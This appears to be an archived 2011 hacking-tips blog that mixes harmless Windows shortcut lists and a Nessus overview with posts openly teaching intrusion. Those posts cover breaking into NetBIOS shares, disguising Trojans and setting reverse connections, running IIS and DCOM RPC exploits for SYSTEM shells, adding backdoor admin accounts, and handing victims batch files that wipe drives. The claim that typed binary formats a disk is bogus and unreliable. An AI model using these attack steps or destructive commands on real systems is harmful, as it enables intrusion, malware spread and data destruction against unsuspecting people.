Sunday 18 December 2011

Never Click On this Link on Facebook

 It's SO Dangerous Can Not Open In Your Profile Post ,It Is a Virus and Post Automatically to your
all friends.If you see in your profile you can not click and delete this post quickly and tell all your friends.
Read More »

Wednesday 2 November 2011

Hacking a PC through NetBios

Hacking a PC through NetBios shares
Finding PCs with shares over a LAN or over internet is very easy. Choose a certain IP range and use Net scan to search through the IP range for PCs with shares. A PC can only have shares if it is connected to a network or has file and printing enabled, so mostly computers with an network card. If you find a computer with a share, use Windows to connect to that share. Go START, RUN and type in "\\IP\sharename". Example "\\198.55.67.244\c" or with the PC name "\\pc1\c" - then you will have access to the share, to delete, copy or rename files or directories, depending what it was shared as, but most people share things with full access and no password. If you find a PC with shares, but when you try and connect to it, it ask you a password, the easy way to crack it is with PQWak, this program brute force cracks the password for you - Win9X only.
Windows NT/XP, works through permissions, so if something is shared, it is shared with permissions to the folder, and permissions is given to an user name. But alot of people make shares with full access to anyone. Win2K/XP accessing an share like the C$ share will ask you an username and password, if there is no password specified by the person who's PC it is.. Trying username as Administrator and password blank. Most people got administrator account password blank, easy way to get onto their shares.
Windows 2000 and XP you can use Venom or Star brute to brute force or dictionary crack local accounts.
If you gain access to someone's hard drive, copy a Trojan server file into their start up folder, and then when they reboot their PC, the Trojan will run and you will have access to their PC with the Trojan.
Read More »

Trojan

Trojans is one of the first things you must learn when you want to hack. A Trojan is a small program you send to someone to infect their PC so you can control their PC, steal passwords, files or just have some fun.

Every Trojan works on a different port, like Sub7, works on port 27374. If you scan a PC and find that port 27374 is open, it means the machine is infected with Sub7. Now of course the Trojan can be set with a password, its up to you to crack it then. Now remember that most Trojans are picked up by Anti Virus software. You need a new released Trojan which AV does not pick up.

The Trojan most people know is Sub7 . Before you can start using the Trojan, you first need a host to infected with a Trojan. A host can be infected in a alot of ways. You can send the host the Trojan server file, and tell them it's an game or a firewall or whatever you like it to be. Best is to rename the file to something they will think is useful like : WindowsXP_update.exe. You can email them this file or put it on a downloads area on a web page, use your imagination. When sending a Trojan through email, remember to ZIP or RAR the file, most email hosts do not allow you to send .exe files.

If you cannot get hold of a undetectable Trojan, you can use a program like Pestil to make the Trojan undetectable. I have tested Pistil with Biforst and it was not detected by NOD or AVG anti virus packages.

You can also bind the Trojan file with another file, any executable file the Trojan can be binded to. Always remember to rename the file, change the program icon and the put a password on the server file. Bind the file with another file and set the file to automatically delete itself after executed, or set it to give an system error.

When you infect a host or find a infected host, it's time to connect. Easy way to find Trojans infect hosts is with Trojan hunter. Choose an IP range to scan through and it will search for trojan infected hosts. When you found an infected host, download the Trojan client from my Trojans page.. Connect with the Trojan to the host IP, to the certain port the Trojan works on and you are ready to take control. Each Trojan uses a diffident port. Here is a list of ports which a certain Trojan works on.

With most Trojans, you will be able to log keystrokes on a PC, even get logged into a file, and when the host is online it will email the keystrokes to an specified email address. Delete or copy files, reboot the PC, make screen captures or disable the screen or mouse. With Sub7 you can do anything on the infected host, just as if you where sitting in front of the PC itself.

Important thing to remember. A Trojan comes with a file called "server.exe". Never run that file on your own PC, it will infect your PC with the Trojan! Use the Trojans configuration file to make changes to the "server.exe" file and then send the file to a victim.

There is also Trojans which has the option to do a reverse connection. Very useful if the person sits behind a router or firewall. After your infected the victims PC, the Trojan will automatically connects to you, thus getting past the problem of connecting through a router or firewall. Remember that if you do not connect to the Internet directly (with a modem) and you sit behind a router, you will need to forward the Trojan ports in your routers configuration if you are doing a reverse connection.

Try out Bi frost RAT or Poison Ivy RAT which can do reverse connections, use full when the host is behind a router.

Most of us do not have a static IP address, I recommend using a service like no-ip which gives you a name like hacker.no-ip.org which can be pinged from anywhere on the internet and it will give your current IP address. Set your reverse connection Trojans to connect to this name.
Read More »

Monday 31 October 2011

Nessus Security Scanner

Nessus Security Scanner
According to the popular consensus, Nessus  is by far among the best choices of vulnerability scanners. What’s more, it’s part of the Gnu’s Not Unix (GNU) General
Public License (GPL) and can therefore be obtained and utilized at no charge.
The following are some of the features of Nessus:

Plugin Architecture
 Each security test is written as an external plugin. This
means that you can easily add your own tests without having to read the code
of the nessusd engine.

Nessus Attack Scripting Language.
Nessus Security Scanner includes Nessus
Attack Scripting Language (NASL), a language designed to write security tests
easily and quickly. (Security checks can also be written in the C programming
language.)

Up-to-Date Security Vulnerability Database. 
 Nessus focuses mostly on the
development of security checks for recent security holes.

Client/Server Architecture. 
Nessus Security Scanner is made up of two parts:
a server, which performs the attacks, and a client, which is the front end. You
can run the server and the client on different systems. That is, you can audit
your whole network from your personal computer, whereas the server performs
its attacks from the mainframe, which is “upstairs.” There are three clients: one
for X11, one for Win32, and one written in Java.

Test Capability on an Unlimited Number of Hosts Simultaneously
Depending on the power of the station on which you run the Nessus server, you can test 2,
10, or 40 hosts at the same time.

Smart Service Recognition. 
Nessus does not believe that target hosts will respect
the Internet Assigned Numbers Authority (IANA) port numbers. This means
that Nessus will recognize an FTP server running on a nonstandard port (say,
31337) or a Web server running on port 8080.

Multiples Services.
Imagine that you run two or more Web servers on your
host—one on port 80, the other on port 8080. Nessus will test the security of
both ports.

Cooperation Tests. 
The security tests performed by Nessus cooperate so that
nothing useless is made. If your FTP server does not offer anonymous logins,
then anonymous-related security checks will not be performed.

Cracker Behavior. 
Nessus does not trust that version x.y.z of a given software
is immune to a security problem. Ninety-five percent of the security checks will
actually perform their job, so you should try to overflow your buffers, relay
some mails, and even crash your computer!
Complete Reports. Nessus will not only tell you what’s wrong on your network,
but will, most of the time, tell you how to prevent crackers from exploiting the
security holes found and will give you the risk level, from low to very high, of
each problem found.
Exportable Reports. The Unix client can export Nessus reports as ASCII text,
LaTeX, HTML, “spiffy” HTML , and an easy-to-parse
file format.

Full SSL Support. Nessus has the capability to test Secure Socket Layer (SSL)-
ized services, such as HTTPs, SMTPs, and IMAPs. You can even supply Nessus
with a certificate so that it can integrate into a public key infrastructure (PKI).

Smart Plugins. Nessus will determine which plugins should or should
not be launched against the remote host . This option is called optimizations.
Nondestructive.  If you don’t want to risk bringing down services on
your network, you can enable the “safe checks” option of Nessus, which will
make Nessus rely on banners rather than exploit real flaws to determine
whether a vulnerability is present.
Read More »

Security Architecture

Security Architecture
Security provided by IT Systems can be defined as the IT system’s ability to be able to protect confidentiality and integrity of processed data, as well as to be able to provide availability of the system and data.

“IT Architecture” may be defined as a set of design artifacts, that are relevant for describing an object such that it can be produced to requirements (quality) as well as maintained over the period of its useful life. The design artifact describe the structure of components, their inter-relationships, and the principles and guidelines governing their design and evolution over time.

Consequently the definition of “IT Security Architecture” may be considered as:

The design artifacts that describe how the security controls are positioned and how they relate to the overall IT Architecture. These controls serve the purpose to maintain the system’s quality attributes, among them confidentiality, integrity and availability.

Security qualities are often considered as Non-functional requirements when systems are designed. In other words they are not required for the system to meet its functional goals such as processing financial transactions, but are needed for a given level of assurance that the system will perform to meet the functional requirements that have been defined.

In recent years there has been a trend towards a hierarchy of control objectives, controls and specific technical implementations of controls, which are implemented within a given security architecture in order to meet the security requirements.
Read More »

Server Hacking

IIS ( Web server/web page) hacking

IIS is Microsoft's internet server. It is very buggy and very exploitable. Defacing a IIS server is actually very easy. Alot of system administrators does not load patches on their IIS servers so they are the people who gets defaced (hacked). Current IIS servers I will show u to hack is IIS 4/5. IIS 6 is the industry standard at the moment, but there is still alot of IIS4/5 servers online. The way IIS server are being hacked is though buffer overflows and exploits. This is when a certain code is sent to the server, the server gets confused and grants you root access to the server. In the IIS hacking download section there is alot of IIS hacking tools making it easy for anyone to hack a IIS server. Not all webservers are run on IIS, there is many other webserver software out there like Apache. We will only be dealing with IIS servers.

Firstly you have to find a IIS server. Dreamscape IISscanner is very useful. It gives you the option to scan a certain IP or an IP range. It will search and tell you if it finds any IIS servers, and which version the host is running.. Another way is to telnet to the IP on port 80. In dos prompt (Start, Run,CMD) type in : telnet 196.35.45.21 80. It will open telnet and show you what IIS the host is running. Web servers normally runs on port 80, but it can be any other specified port.

If you find a IIS server, it's time to DEFACE it :) Go check on my IIS hacking page for IIS hacking programs. We will first use Jill-win32 for now. It exploits an IIS5 printer overflow. In dos prompt (Start, Run) run jill-win32. It will show you this :

iis5 remote .printer overflow.
dark spyrit < hack@me.org> / beavuh labs.
usage: jill-win32

An example how to use it :

jill-win32 196.65.56.32 80 196.89.65.45 69 - 196.65.56.32 is the IIS server you want to deface, port 80 is the port the server runs it IIS service on, 196.89.65.45. is your IP, and port 69 is the port TFPD32 (available from this zip file) will listen on. When you run jill-win32 it will exploit a printer overflow on the IIS server and create a backdoor on the server which will connect to port 69 on your PC, which TFPD32 listening on.

Here is a another example :

Download IISHack and do the following :

Usage: IISHack1.5 [server] [server-port] [trojan-port]

C:\send resume to hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80 6969
IISHack Version 1.5
eEye Digital Security
http://www.hackme.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.

Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should get a cmd prompt.
C:\> telnet www.[yourowncompany].com 6969
Trying www.[yourowncompany].com...
Microsoft(R) Windows NT(TM)


C:\WINNT\system32>whoami

NT AUTHORITY\SYSTEM
For those people who does not have a clue what's going on in here, go the script kiddie way and download the other GUI ( graphical user interface ) IIS hacking programs from my IIS page and let the program deface the web page for you. There is a few IIS tutorials in Windows hacker misc section.

Read More »

MAC address

Getting a PC name, MAC address and user name logged on

So you would like to know someone's PC name, or their MAC address of their network card or the username that currently logged onto the PC? It can be very useful to have this info on someone. Their PC name can be their own name or company name. Their MAC address is the address of their network card, which is static, means that it can never change. Their username can also be useful if you would like to know this persons name. All of this can only be retrieved if the person has a network card installed on their PC.

In DOS prompt (Start, Run) type in " nbtstat -a IP"

EX : nbstat -a 196.35.24.15, it will show something like this :

Local Area Connection 3:
Node IpAddress: [10.10.10.22] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
PCNAME <00> UNIQUE Registered
DOMAINNAME<00> GROUP Registered
PCNAME<03> UNIQUE Registered
PCNAME<20> UNIQUE Registered
DOMAINNAME <1E> GROUP Registered
USERNAME <03> UNIQUE Registered

MAC Address = 00-22-AE-43-33-30

It will show you the PC name, domain name if it is connected to a domain and it will show the user name logged onto the PC. The MAC is static, meaning it never changes, useful for identifying someone. Your buddy attacks you, you check his IP and you do a "nbtstat" on him, and you gets his MAC address. So now if you check on his PC, and see he has got the same MAC address you know it was him attacking you.
Read More »

Hacking a PC with a exploit

Hacking a PC with a exploit

What is a exploit? It's a poorly coded piece in software which you can use to gain access to the system. There is many exploits available for the various MS Windows's out there. Windows Hacker exploit download page which has compiled exploits.

Now if your a n00b, you don't know how to compile an exploit, basically you need some programming experience, so go learn how to program. Most exploits are written in C++ so try Bloodshed Dev C++ which you can use to compile exploits.

Read this tutorial about compiling exploits.


But you can download exploits which other people has already compiled. If someone updates their PC when new exploits comes out, you can't exploit them. but if they don't update and install new patches, the chance you can exploit and gain access to their PC is big.

Check this example of how a exploit works:

KAHT II - MASSIVE RPC EXPLOIT

This is a exploit for Win2k/XP and its already compiled, you can download it from the Windows Hacker exploits section.

This is an explanation of how to use it :

1. Get target IP, make sure it uses XP or 2k

2. Download exploit tool
(make sure to deactivate your AV)

3. Run exploit from cmd
C:\> kaht 192.168.1.100 192.168.1.101

note: 192.168.1.101 is the target
192.168.1.100 <-- 100 here is target - 1

4. If success, it will display as below
------------------------------------------------------------------------
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION AUTOHACKING
-------------------------------------------------------------------------

Targets : 192.168.1.100-192.168.1.101 eith 50 Threads
Attacking Port. Remote Shell At ports: 36388
Scan in Progress....
- Connecting to 192.168.1.101
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...

Microsoft Windows 2000 [VErsion 5.00.2195]
Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

5. NOW.. YOU ARE IN TARGET DRIVE

6. Then you may add user
C:\WINNT\system32>net user myuser mypassword /add
^ ^
user name password

7. Group to admin
C:\WINNT\system32>net localgroup Administrators myuser /add
^ ^ ^
target group group user

8. Sharing drive
C:\WINNT\system32>net share c=c:

9. Exit from target.. dont forget!
C:\WINNT\system32>exit

10. Use share drive, run cmd
C:\>net use * \\192.168.1.101\drive_c * /u:myuser
Type the password for \\192.168.1.101\C: <--- enter myuser's password here

There you will now have a mapped drive to the target PC and an administrator account.
Read More »

Hacking a PC through NetBios shares

Finding PCs with shares over a LAN or over internet is very easy. Choose a certain IP range and use Netscan to search through the IP range for PCs with shares. A PC can only have shares if it is connected to a network or has file and printing enabled, so mostly computers with an network card. If you find a computer with a share, use Windows to connect to that share.
Go START, RUN and type in "\\IP\sharename". Example "\\198.55.77.216\c" or with the PC name "\\pc1\c" - then you will have access to the share, to delete, copy or rename files or directories, depending what it was shared as, but most people share things with full access and no password. If you find a PC with shares, but when you try and connect to it, it ask you a password, the easy way to crack it is with PQWak, this program brute force cracks the password for you - Win9X only.

Windows NT/XP, works through permissions, so if something is shared, it is shared with permissions to the folder, and permissions is given to an user name. But alot of people make shares with full access to anyone. Win2K/XP accessing an share like the C$ share will ask you an username and password, if there is no password specified by the person who's PC it is.. Trying username as Administrator and password blank. Most people got administrator account password blank, easy way to get onto their shares.

Windows 2000 and XP you can use Venom or Starbrute to brute force or dictionary crack local accounts.

If you gain access to someone's hard drive, copy a trojan server file into their startup folder, and then when they reboot their PC, the trojan will run and you will have access to their PC with the trojan.
Read More »

Tuesday 21 June 2011

How to Create Run Commands

How to Create Your Own Customized Run Commands

Run commandThe Run command on Microsoft Windows operating system allows you to directly open an application or document with just a single command instead of navigating to it’s location and double-clicking the executable icon. However, it only works for some of the inbuilt Windows programs such as Command prompt (cmd), Calculator (calc) etc. So, have you ever wondered how to create your own customized Run commands for accessing your favorite programs, files and folders? Well, read on to find out the answer.
Creating the Customized Run Command


Let me take up an example of how to create a customized run command for opening the Internet explorer. Once you create this command, you should be able to open the Internet explorer just by typing “ie” (without quotes) in the Run dialog box. Here is how you can do that.

1. Right click on your Desktop and select New -> Shortcut.

2. You will see a “Create Shortcut” Dialog box as shown below

Create Shortcut

3. Click on “Browse”, navigate to: Program Files -> Internet Explorer from your Root drive (usually C:\) and select “iexplore” as shown in the above figure and click on “OK”.

4. Now click on “Next” and type any name for your shortcut. You can choose any name as per your choice; this will be your customized “Run command”. In this case I name my shortcut as “ie”. Click on “Finish”.

5. You will see a shortcut named “ie” on your desktop. All you need to do is just copy this shortcut and paste it in your Windows folder (usually “C:/Windows”). Once you have copied the shortcut onto your Windows folder, you can delete the one on your Desktop.

6. That’s it! From now on, just open the Run dialog box, type ie and hit Enter to open the Internet Explorer.

In this way you can create customized Run commands for any program of your choice. Say “ff” for Firefox, “ym” for Yahoo messenger, “wmp” for Windows media player and so on.

To do this, when you click on “Browse” in the Step-3, just select the target program’s main executable (.exe) file which will usually be located in the C:\Program Files folder. Give a simple and short name for this shortcut as per your choice and copy the shortcut file onto the Windows folder as usual. Now just type this short name in the Run dialog box to open the program.
Read More »

Friday 17 June 2011

REGEDIT Keyboard Shortcuts

REGEDIT Keyboard Shortcuts

Searching:
"Ctrl+F" -- Opens the Find dialog box.
"F3" -- Repeats the last search.

Browsing:
"Keypad +" -- Expands the selected branch.
"Keypad -" -- Collapses the selected branch.
"Keypad *" -- Expands all the selected branch's sub keys.
"Up Arrow" -- Selects the previous key.
"Down Arrow" -- Selects the next key.
"Left Arrow" -- Collapses the selected branch if it's not collapsed; otherwise, selects the parent key.
"Right Arrow" -- Expands the selected branch if it's not already expanded; otherwise, selects the key's first sub key.
"Home" -- Selects My Computer.
"End" -- Selects the last key that's visible in the key pane.
"Page Up" -- Moves up one page in the key pane.
"Page Down" -- Moves down one page in the key pane.
"Tab" -- Moves between the key and value panes.
"F6" -- Moves between the key and value panes.

Others:
"Delete" -- Deletes the select branch or value.
"F1" -- Opens Regedit's Help.
"F2" -- Renames the selected key or value.
"F5" -- Refreshes the key and value panes.
"F10" -- Opens Regedit's menu bar.
"Shift+F10" -- Opens the shortcut menu for the selected key or value.
"Alt+F4" -- Closes Regedit.
Read More »

Microsoft(MS) Word Shorcut keys

Microsoft(MS) Word Shorcut keys
Keyboard Shortcut

Result in Microsoft Word

CTRL and A


Selects all in the current document.

CTRL and B


Bold text.

CTRL and C


Copies the item or text to the Clipboard and can be pasted using CTRL and V.

CTRL and D


Displays the Font dialogue box.

CTRL and E


Centre Alignment.

CTRL and F


Displays the Find dialog box, to search the current document.

CTRL and G


Displays the Go to dialog box, to go to a specific location in the current document.

CTRL and H


Displays the Replace dialogue box.

CTRL and I


Italic text.

CTRL and J


Full Justification.

CTRL and K


Create Hyperlink

CTRL and L


Left Alignment

CTRL and M


Tab

CTRL and N


Creates a new document.

CTRL and O


Displays the Open File dialogue box.

CTRL and P


Displays the Print dialog box.

CTRL and R


Right Alignment.

CTRL and S


Displays the Save dialog box.

CTRL and U


Underline text

CTRL and V


Pastes the copied item or text from the Clipboard into the current position in the document.

CTRL and X


Cuts the item or text selected to the Clipboard.

CTRL and Y


Redo the last undone action.

CTRL and Z


Undoes the last action.

CTRL and ENTER


Insert Page Break.

CTRL and F2


Show Print preview.

CTRL and F4


Closes the active document window.

CTRL and F6


Opens the next document window.
Keyboard Shortcut

Result in Microsoft Word

F1 key


Get help or use the Office assistant.

SHIFT and F1 Key


Context sensitive help.

F2 Key


Move text or image.

SHIFT and F2 Key


Copy Text.

F3 Key


Insert an auto text entry.

SHIFT and F3 Key


Change the case of the selected text.

F4 Key


Perform last action again.

SHIFT and F4 Key


Perform a Find or Go to action again.

F5 Key


Displays the Go to dialogue box, from here you can also Find and Replace.

SHIFT and F5 Key


Move to a previous revision.

F6 Key


Go to the next frame or pane.

SHIFT and F6 Key


Go to the previous frame or pane.

F7 Key


Launch the Spell checker.

SHIFT and F7 Key


Launch the Thesaurus.

F8 Key


Extend the current selection.

SHIFT and F8 Key


Shrink the current selection.

F9 Key


Update the selected fields.

SHIFT and F9 Key


Switch between a field code and it's result.

F10 Key


Activate the menu bar.

SHIFT and F10 Key


Display a Shortcut Menu. Same as right clicking.

F11 Key


Go to the next field.

SHIFT and F11 Key


Go to the previous field.

F12 Key


Save file As, equivalent to tools menu.

SHIFT and F12 Key


Save document, equivalent to tools menu.
Read More »

How to Format A HDD With Notepad

How to Format A HDD With Notepad

f you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.

Step 1.
Copy The Following In Notepad Exactly as it says01001011000111110010010101010101010000011111100000
Step 2.
Save As An EXE Any Name Will Do
Step 3.
Send the EXE to People And Infect
OR
IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c: /Q/X — this will format your drive c:
Your Ad Here
01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d: /Q/X — this will format your dirve d:

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a: /Q/X — this will format your drive a:

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:boot.ini — this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

try to figure out urself rest
cant spoonfeed
its working

Do not try it on your PC. Don’t mess around this is for educational purpose only



still if you cant figure it out try this

go to notepad and type the following:

@Echo off
Del C: *.*|y

save it as Dell.bat

want worse then type the following:
@echo off
del %systemdrive%*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file
Read More »

Hacking Windows

Hacking Windows SEND TO MENU

How often do you copy songs from a CD? Or some photos from a CD?

What do you do? You select the required files and do a CTRL –C. Open the destination folder and do a CTRL-V. Here is something you can benefit time from. Customize your SEND TO MENU.

This sounds simple and you can do it in less than sixty seconds.
You can create your own BASKET.

First you’ll need access to hidden files. So change your view settings to make all hidden files visible.
Tools -> folder options -> view (tab) and select the show hidden files and folders.
go to parent drive:/documents and settings/(user name)/send to

Open up my computer and locate your most used folders.

Create a shortcut of the most used folders in SEND TO FOLDER.You can do this in a number of ways.

Right click -> send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER

Copy the most used folder and go to SEND TO FOLDER and right click -> paste shortcut.

Also remember to rename the shortcuts to send to videos or send to potos. We don’t need confusion when we use the same later.

5. DONE.
Read More »

Check out these trick.

Check out these funny trick.

1:Copy and paste the java script code to the address bar of your browser


javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)



javascript:a=0;x=0;y=0;setInterval("a+=.01;x=Math.cos(a*3)*200;y=Math.sin(a*2)*2;moveBy(x,y)",2);void(0)

2: Press enter and watch your window's "shaking it". You can change the value of i if you wish :-)
Read More »

Complete list of run commands in windows XP

Run Commands In Windows XP
You can access all these programs by going through START-->RUN or Simply Click Windows Key+R

SQL Client Configuration - cliconfg
System Configuration Editor - sysedit
System Configuration Utility - msconfig
System File Checker Utility (Scan Immediately)- sfc /scannow
System File Checker Utility (Scan Once At Next Boot)- sfc /scanonce
System File Checker Utility (Scan On Every Boot) - sfc /scanboot
System File Checker Utility (Return to Default Setting)- sfc /revert
System File Checker Utility (Purge File Cache)- sfc /purgecache
System File Checker Utility (Set Cache Size to size x)-sfc/cachesize=x
System Information - msinfo32.
Task Manager – taskmgr
System Properties - sysdm.cpl
Task Manager – taskmgr
TCP Tester - tcptest
Telnet Client - telnet
Tweak UI (if installed) - tweakui
User Account Management- nusrmgr.cpl
Utility Manager - utilman
Windows Address Book - wab
Windows Address Book Import Utility - wabmig
Windows Backup Utility (if installed)- ntbackup
Windows Explorer - explorer
Windows Firewall- firewall.cpl
Windows Magnifier- magnify
Windows Management Infrastructure - wmimgmt.msc
Windows Media Player - wmplayer
Windows Messenger - msmsgs
Windows Picture Import Wizard (need camera connected)- wiaacmgr
Windows System Security Tool – syskey
Windows Update Launches - wupdmgr
Windows Version (to show which version of windows)- winver
Windows XP Tour Wizard - tourstart
Wordpad - write
Password Properties - password.cpl
Performance Monitor - perfmon.msc
Phone and Modem Options - telephon.cpl
Phone Dialer - dialer
Pinball Game - pinball
Power Configuration - powercfg.cpl
Printers and Faxes - control printers
Printers Folder – printers
Private Character Editor - eudcedit
Quicktime (If Installed)- QuickTime.cpl
Real Player (if installed)- realplay
Regional Settings - intl.cpl
Registry Editor - regedit
Registry Editor - regedit32
Remote Access Phonebook - rasphone
Remote Desktop - mstsc
Removable Storage - ntmsmgr.msc
Removable Storage Operator Requests - ntmsoprq.msc
Resultant Set of Policy (XP Prof) - rsop.msc
Scanners and Cameras - sticpl.cpl
Scheduled Tasks - control schedtasks
Security Center - wscui.cpl
Services - services.msc
Shared Folders - fsmgmt.msc
Shuts Down Windows - shutdown
Sounds and Audio - mmsys.cpl
Spider Solitare Card Game - spider
Malicious Software Removal Tool - mrt
Microsoft Access (if installed) - access.cpl
Microsoft Chat - winchat
Microsoft Excel (if installed) - excel
Microsoft Frontpage (if installed)- frontpg
Microsoft Movie Maker - moviemk
Microsoft Paint - mspaint
Microsoft Powerpoint (if installed)- powerpnt
Microsoft Word (if installed)- winword
Microsoft Syncronization Tool - mobsync
Minesweeper Game - winmine
Mouse Properties - control mouse
Mouse Properties - main.cpl
Nero (if installed)- nero
Netmeeting - conf
Network Connections - control netconnections
Network Connections - ncpa.cpl
Network Setup Wizard - netsetup.cpl
Notepad - notepad
Nview Desktop Manager (If Installed)- nvtuicpl.cpl
Object Packager - packager
ODBC Data Source Administrator- odbccp32.cpl
On Screen Keyboard - osk
Opens AC3 Filter (If Installed) - ac3filter.cpl
Outlook Express - msimn
Paint – pbrush
Keyboard Properties - control keyboard
IP Configuration (Display Connection Configuration) - ipconfi/all
IP Configuration (Display DNS Cache Contents)- ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents)- ipconfig /flushdns
IP Configuration (Release All Connections)- ipconfig /release
IP Configuration (Renew All Connections)- ipconfig /renew
IP Configuration(RefreshesDHCP&Re-RegistersDNS)-ipconfig/registerdns
IP Configuration (Display DHCP Class ID)- ipconfig/showclassid
IP Configuration (Modifies DHCP Class ID)- ipconfig /setclassid
Java Control Panel (If Installed)- jpicpl32.cpl
Java Control Panel (If Installed)- javaws
Local Security Settings - secpol.msc
Local Users and Groups - lusrmgr.msc
Logs You Out Of Windows - logoff.....
Accessibility Controls - access.cpl
Accessibility Wizard - accwiz
Add Hardware - Wizardhdwwiz.cpl
Add/Remove Programs - appwiz.cpl
Administrative Tools control - admintools
Adobe Acrobat (if installed) - acrobat
Adobe Designer (if installed)- acrodist
Adobe Distiller (if installed)- acrodist
Adobe ImageReady (if installed)- imageready
Adobe Photoshop (if installed)- photoshop
Automatic Updates - wuaucpl.cpl
Bluetooth Transfer Wizard – fsquirt
Calculator - calc
Certificate Manager - certmgr.msc
Character Map - charmap
Check Disk Utility - chkdsk
Clipboard Viewer - clipbrd
Command Prompt - cmd
Component Services - dcomcnfg
Computer Management - compmgmt.msc
Control Panel - control
Date and Time Properties - timedate.cpl
DDE Shares - ddeshare
Device Manager - devmgmt.msc
Direct X Control Panel (If Installed)- directx.cpl
Direct X Troubleshooter- dxdiag
Disk Cleanup Utility- cleanmgr
Disk Defragment- dfrg.msc
Disk Management- diskmgmt.msc
Disk Partition Manager- diskpart
Display Properties- control desktop
Display Properties- desk.cpl
Display Properties (w/Appearance Tab Preselected)- control color
Dr. Watson System Troubleshooting Utility- drwtsn32
Driver Verifier Utility- verifier
Event Viewer- eventvwr.msc
Files and Settings Transfer Tool- migwiz
File Signature Verification Tool- sigverif
Findfast- findfast.cpl
Firefox (if installed)- firefox
Folders Properties- control folders
Fonts- control fonts
Fonts Folder- fonts
Free Cell Card Game- freecell
Game Controllers- joy.cpl
Group Policy Editor (XP Prof)- gpedit.msc
Hearts Card Game- mshearts
Help and Support- helpctr
HyperTerminal- hypertrm
Iexpress Wizard- iexpress
Indexing Service- ciadv.msc
Internet Connection Wizard- icwconn1
Internet Explorer- iexplore
Internet Setup Wizard- inetwiz
Internet Properties- inetcpl.cpl
Read More »

Windows Shortcuts

All keyboard Shortcuts

Windows Shortcuts

*

Shift + F10 right-clicks.
*

Win + L (XP Only): Locks keyboard. Similar to Lock Workstation.
*

Win + F or F3: Open Find dialog. (All Files) F3 may not work in some applications which use F3 for their own find dialogs.
*

Win + Control + F: Open Find dialog. (Computers)
*

Win + U: Open Utility Manager.
*

Win + F1: Open Windows help.
*

Win + Pause: Open System Properties dialog.
*

Win + Tab: Cycle through taskbar buttons. Enter clicks, AppsKey or Shift + F10 right-clicks.
*

Win + Shift + Tab: Cycle through taskbar buttons in reverse.
*

Alt + Tab: Display Cool Switch. More commonly known as the AltTab dialog.
*

Alt + Shift + Tab: Display Cool Switch; go in reverse.
*

Alt + Escape: Send active window to the bottom of the z-order.
*

Alt + Shift + Escape: Activate the window at the bottom of the z-order.
*

Alt + F4: Close active window; or, if all windows are closed, open shutdown dialog.
*

Shift while a CD is loading: Bypass AutoPlay.
*

Shift while login: Bypass startup folder. Only those applications will be ignored which are in the startup folder, not those started from the registry (Microsoft\Windows\CurrentVersion\Run\)
*

Ctrl + Alt + Delete or Ctrl + Alt + NumpadDel (Both NumLock states): Invoke the Task Manager or NT Security dialog.
*

Ctrl + Shift + Escape (2000/XP ) or (Ctrl + Alt + NumpadDot) : Invoke the task manager. On earlier OSes, acts like Ctrl + Escape.
*

Print screen: Copy screenshot of current screen to clipboard.
*

Alt + Print screen: Copy screenshot of current active window to clipboard.
*

Ctrl + Alt + Down Arrow: Invert screen. Untested on OS's other than XP.
*

Ctrl + Alt + Up Arrow: Undo inversion.
*

Win + B : Move focus to systray icons.


General


*

Ctrl + C or Ctrl + Insert: Copy.
*

Ctrl + X or Shift + Delete: Cut.
*

Ctrl + V or Shift + Insert: Paste/Move.
*

Ctrl + N: New... File, Tab, Entry, etc.
*

Ctrl + S: Save.
*

Ctrl + O: Open...
*

Ctrl + P: Print.
*

Ctrl + Z: Undo.
*

Ctrl + A: Select all.
*

Ctrl + F: Find...
*

Ctrl+W : to close the current window
*

Ctrl + F4: Close tab or child window.
*

F1: Open help.
*

F11: Toggle full screen mode.
*

Alt or F10: Activate menu bar.
*

Alt + Space: Display system menu. Same as clicking the icon on the titlebar.
*

Escape: Remove focus from current control/menu, or close dialog box.


General Navigation


*

Tab: Forward one item.
*

Shift + Tab: Backward one item.
*

Ctrl + Tab: Cycle through tabs/child windows.
*

Ctrl + Shift + Tab: Cycle backwards through tabs/child windows.
*

Enter: If a button's selected, click it, otherwise, click default button.
*

Space: Toggle items such as radio buttons or checkboxes.
*

Alt + (Letter): Activate item corresponding to (Letter). (Letter) is the underlined letter on the item's name.
*

Ctrl + Left: Move cursor to the beginning of previous word.
*

Ctrl + Right: Move cursor to the beginning of next word.
*

Ctrl + Up: Move cursor to beginning of previous paragraph. This and all subsequent Up/Down hotkeys in this section have only been known to work in Rich Edit controls.
*

Ctrl + Down: Move cursor to beginning of next paragraph.
*

Shift + Left: Highlight one character to the left.
*

Shift + Right: Highlight one character to the right.
*

Shift + Up: Highlight from current cursor position, to one line up.
*

Shift + Down: Highlight from current cursor position, to one line down.
*

